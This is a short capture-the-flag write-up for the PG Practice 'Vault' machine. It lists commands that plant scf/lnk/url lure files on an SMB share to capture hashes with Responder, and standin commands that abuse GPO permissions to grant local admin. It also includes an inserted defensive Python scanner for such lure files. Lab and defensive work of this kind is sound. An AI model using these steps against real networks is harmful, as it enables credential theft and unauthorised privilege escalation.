Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice
We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO permissions and explore two unintended privilege escalations.
Notes
Creating scf/lnk/url files via hashgrab:
python3 ~/tools/hashgrab/hashgrab.py <ip> xct
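From the defender's side, writable shares can be swept for scf/lnk/url files that reference a UNC path on a host you do not control. The scanner below is an added example, not part of the original notes or of hashgrab; the allow-listed host name, the sample bytes and the idea of running it against a locally mounted share are assumptions.

```python
import re
import sys
from pathlib import Path

LURE_EXTS = {".scf", ".url", ".lnk"}      # file types named in the notes above
ALLOWED_HOSTS = {"fs01.corp.example"}     # assumption: your own file servers
ASCII_UNC = re.compile(rb"\\\\[\x21-\x7e]+")                 # \\host\path in ANSI text
WIDE_UNC = re.compile(rb"\\\x00\\\x00(?:[\x21-\x7e]\x00)+")  # same path as UTF-16LE
HOST = re.compile(r"^\\\\([^\\@]+)(?:@[^\\]*)?\\")           # host, optional @port

# Constructed samples, not taken from the page.
SAMPLE_SCF = b"[Shell]\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
SAMPLE_WIDE = "\\\\fs01.corp.example\\tools\\app.ico".encode("utf-16-le")


def remote_refs(data: bytes) -> list[str]:
    """Return UNC paths found in raw file bytes whose host is not allow-listed."""
    found = [m.group().decode("ascii") for m in ASCII_UNC.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in WIDE_UNC.finditer(data)]
    refs = []
    for path in found:
        host = HOST.match(path)
        if host and host.group(1).lower() not in ALLOWED_HOSTS:
            refs.append(path)
    return refs


def scan_share(root: str) -> dict[str, list[str]]:
    """Walk a mounted share; map each shortcut-type file to its external UNC paths."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in LURE_EXTS:
            refs = remote_refs(p.read_bytes())
            if refs:
                hits[str(p)] = refs
    return hits


if __name__ == "__main__":
    # Usage: python3 scan_share.py /mnt/share  (prints sample results with no argument)
    if len(sys.argv) > 1:
        for name, refs in scan_share(sys.argv[1]).items():
            print(name, refs)
    else:
        print(remote_refs(SAMPLE_SCF), remote_refs(SAMPLE_WIDE))
```

Paths containing spaces are cut at the first space, which still leaves the host visible for triage.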
GPO Abuse via standin:
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
cmd /c "gpupdate /force"
Other resources:
This post is licensed under CC BY 4.0 by the author.